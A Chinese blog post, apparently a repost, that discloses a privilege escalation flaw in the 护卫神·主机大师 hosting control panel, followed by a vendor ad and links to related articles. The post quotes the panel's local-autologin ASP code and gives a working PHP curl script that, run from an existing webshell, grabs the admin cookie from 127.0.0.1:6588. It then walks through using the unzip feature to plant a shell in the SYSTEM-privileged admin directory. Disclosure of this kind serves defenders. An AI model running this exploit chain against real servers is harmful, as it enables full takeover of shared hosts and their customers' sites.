护卫神mysql提权_护卫神主机大师被提权漏洞利用(可千万不能乱装护卫神主机管理一键安装的软件)...
“护卫神·主机大师支持一键安装网站运行环境(IIS+ASP+ASP.net+PHP5.2-5.6+MySQL+FTP+伪静态+PhpMyAdmin),并可在线开设主机、SQL Server和MySQL;Web方式管理,拥有独立前台和后台面板。支持Windows Server 2008/2012。结合护卫神14年安全防护经验,严格限制每个站点独立权限,彻底阻挡跨站入侵。”
这话说的有点绝对性,做安全是没有绝对的安全的,如果哪家做安全的敢那样说,绝对不会出问题那肯定是在对客户的不负责任。安全是相对的,需要知己知彼 双方的配合以及安全的不断完善化才能把安全做道最大化的保障。
先看看装好后的软件界面,可以看到一些常见的主机操作功能。其中网站管理引起了我的注意,点开瞅瞅
点开之后就直接进去了,WTF?
从逻辑流程来看这里很明显有问题,撸开代码看看怎么验证的。虚拟主机管理系统运行在6588端口。且采用asp语言开发。程序路径为x:\HwsHostMaster\host\web\下,且默认为system权限运行。
/admin/index.asp
Dim strIp
strIp = Request.ServerVariables("local_addr")
Dim strAuto
strAuto = LCase(Trim(Request.QueryString("f")))
If (strIp = "::1" Or strIp = "127.0.0.1") And strAuto = "autologin" Then
'获取管理用户登录
Dim sql,rs
call conn_open()
Set rs = Server.CreateObject("Adodb.Recordset")
sql = "select top 1 * from [huweishen_Admin]"
rs.Open sql,conn,1,1
if rs.RecordCount = 0 then
Session("admin")= "autologin"
else
Session("admin") = rs("username")
end if
rs.Close
Session.Timeout =600
AddLog Session("admin"), 1, "控制台直接登录管理中心"
Response.Redirect "index.asp"
End If
%>
代码乍一看好像没啥问题,但是开发者疏忽了一个问题,第9行判断来源ip是否为本地访问,strIp变量来自Request.ServerVariables(“local_addr”) ,如果为本地访问且strAuto=autologin则直接登入系统,无需账号密码验证,这就出现一个问题了,开发者未考虑内部用户是否合法,如果我获取到一个低权限的webshell、那就相当于获取到一个本地身份了。那么我就可以直接访问到虚拟主机管理后台了。那么就可以为所欲为了。
本漏洞利用前提是已经获取到虚拟主机上的一个webshell,其次在通过以下脚本获取cookie即可进入虚拟主机管理后台。
function httpGet() {
$url = '[http://127.0.0.1:6588/admin/index.asp?f=autologin](http://127.0.0.1:6588/admin/index.asp?f=autologin)';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, TRUE); //表示需要response header
curl_setopt($ch, CURLOPT_NOBODY, TRUE); //表示需要response body
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, FALSE);
curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
curl_setopt($ch, CURLOPT_TIMEOUT, 120);
$result = curl_exec($ch);
return $result;
}
echo httpGet();
?>
将该脚本上传至服务器,访问后即可获取到管理员cookie。在本地修改cookie后即可进入到虚拟主机管理后台。绕过登录限制。
直接访问需要登录
通过脚本获取cookie
修改cookie后直接访问/admin/index.asp,进入后台
进入后台后点击网站列表,随便选择一个网站,点击解压进入操作界面,通过FTP或其他方式上传shell压缩包,然后输入文件名和解压路径,解压路径选择护卫神管理系统路径,一般为X:\HwsHostMaster\host\web\ X为任意盘符。
在我这里普通网站目录和护卫神管理系统都在D盘下,所以采用相对路径指向到虚拟主机管理系统web路径即可点击解压以后,shell就躺在管理系统目录下了。并且为system权限。成功获取到高权身份
该漏洞利用场景较为鸡肋,前提要求已经获取到该主机上的shell,才可采用该方法进行提权。开发者在开发过程中不要对内部不要过于信任,因为你也无法确保内部绝对的安全。
专注于安全领域 解决网站安全 解决网站被黑 网站被挂马 网站被篡改
网站安全、服务器安全提供商-www.sinesafe.com --专门解决其他人解决不了的网站安全问题.
护卫神mysql提权_护卫神主机大师被提权漏洞利用(可千万不能乱装护卫神主机管理一键安装的软件)...相关推荐
- 护卫神mysql提权_护卫神主机大师被提权漏洞利用(可千万不能乱装护卫神主机大师安装的软件)...
原标题:护卫神主机大师被提权漏洞利用(可千万不能乱装护卫神主机大师安装的软件) "护卫神·主机大师支持一键安装网站运行环境(IIS+ASP+ASP.net+PHP5.2-5.6+MySQL+ ...
- 护卫神主机大师被提权漏洞利用(可千万不能乱装护卫神主机管理一键安装的软件)
"护卫神·主机大师支持一键安装网站运行环境(IIS+ASP+ASP.net+PHP5.2-5.6+MySQL+FTP+伪静态+PhpMyAdmin),并可在线开设主机.SQL Server和 ...
- 护卫神主机大师被提权漏洞利用(可千万不能乱装护卫神主机管理一键安装的软件)...
"护卫神·主机大师支持一键安装网站运行环境(IIS+ASP+ASP.net+PHP5.2-5.6+MySQL+FTP+伪静态+PhpMyAdmin),并可在线开设主机.SQL Server和 ...
- 护卫神mysql初始密码_护卫神MySQL密码重置器(MySQL密码重置工具)V1.3 最新免费版...
护卫神MySQL密码重置器(MySQL密码重置工具)是专门针对MySQL数据库最新开发的密码修改软件.mysql数据库忘记密码时如何修改?护卫神MySQL密码重置器(MySQL密码重置工具)轻松帮助用 ...
- 护卫神mysql无法启动_护卫神·故障应急排查
适合环境:windows平台 通过护卫神工程师专业的排查,解决常见的服务器各种故障问题,网站无法访问,服务器或云主机资源占用异常,网站打开异常慢,各种入侵出现的问题,网站访问出现500错误无法打开等. ...
- 护卫神mysql域名连接_护卫神·主机大师WEB管理端绑定自己的域名_护卫神
护卫神·主机大师面板上的网站管理WEB端地址默认为http://服务器IP:6588/admin.为了方便管理,可以绑定指定的域名,通过以下两种方法修改. 第一种方法: 在服务器上打开"护卫 ...
- 程序员如何跟领导提离职_如何优雅地跟老板提加薪?按照这3个步骤来,也不是什么难事...
通常情况下,如果你在一个制度比较健全的单位上班,基本上不需要自己提出加薪的要求,达到规定的条件自然就涨工资了. 但是我们绝大部分人,是在中小企业上班,如果不跟老板提加薪要求,老板很难主动给你涨工资. ...
- asp.net怎么写上传图片到mysql的页面_【web安全】文件上传漏洞
文件上传漏洞● 0x00 什么是文件上传漏洞 文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力.利用上传漏洞可以直接得到WEBSHELL,危害等级超级高.上 ...
- mysql limit sql注入_LIMIT子句中的盲 SQL注入漏洞利用
原文:https://www.noob.ninja/2019/07/exploiting-tricky-blind-sql-injection.html 前言 嘿!有好长时间没有更新过博客了,不知道大 ...
最新文章
- WebMisDeveloper4.2.0面世
- 链表学习(一)静态链表的构造
- 【Python】Python办公自动化 | 一键给PDF文件加密,超方便
- ByteTrack实时多目标跟踪
- HashSet,TreeSet和LinkedHashSet的区别
- 总结了C#中string.format用法。分享给大家供大家参考。具体分析如下:
- 车萝卜CEO马斌斌:真正自动驾驶的时候你更需要HUD和ARHUD...
- 休闲娱乐游戏-贱鸟跳跳
- 心路历程19 -- 回顾整个历程 by tsui
- Wondershare Recoverit for Mac(数据恢复套件)
- String,StringBuffer,StringBulilder之间的区别
- 支持向量机SVM原理(参数解读和python脚本)
- 练字一定要用钢笔吗?
- Java教学视频下载(全集)
- 刀友访谈:哪有什么天生的设计大师,有的是长久的喜爱坚持
- Keystone认证服务详细操作流程
- Android切词工具——BreakIterator(1)
- android大作业报告总结,android大作业总结报告.doc
- QCC512x QCC302x 使用I2C驱动外设(Bitserial)
- 克罗内克积【kronecker product】
热门文章
- freehand8_在Illustrator和Freehand中创建仿制3D图形
- 通信原理循环码基本原理
- 2021-01-25 matlab2018a license manager error -8简单解决办法
- 计算机忘记用户密码,电脑开机密码忘记了怎么办?
- pcl聚类----欧式聚类分割方法
- IjkVideoView播放视频(支持avi格式的视频)
- 江南大学计算机与科学研究生分数线,江南大学2021考研分数线已公布
- SpringBoot允许跨域请求
- 对话系统-“问答型”单轮对话:FAQ检索式对话系统【步骤:①用户意图判断、②文本检索召回、③文本匹配计算排序】【搜索引擎的最终形态】
- 【C51单片机学习笔记--DS1302时钟芯片蜂鸣器I2C总线AT24C02存储器】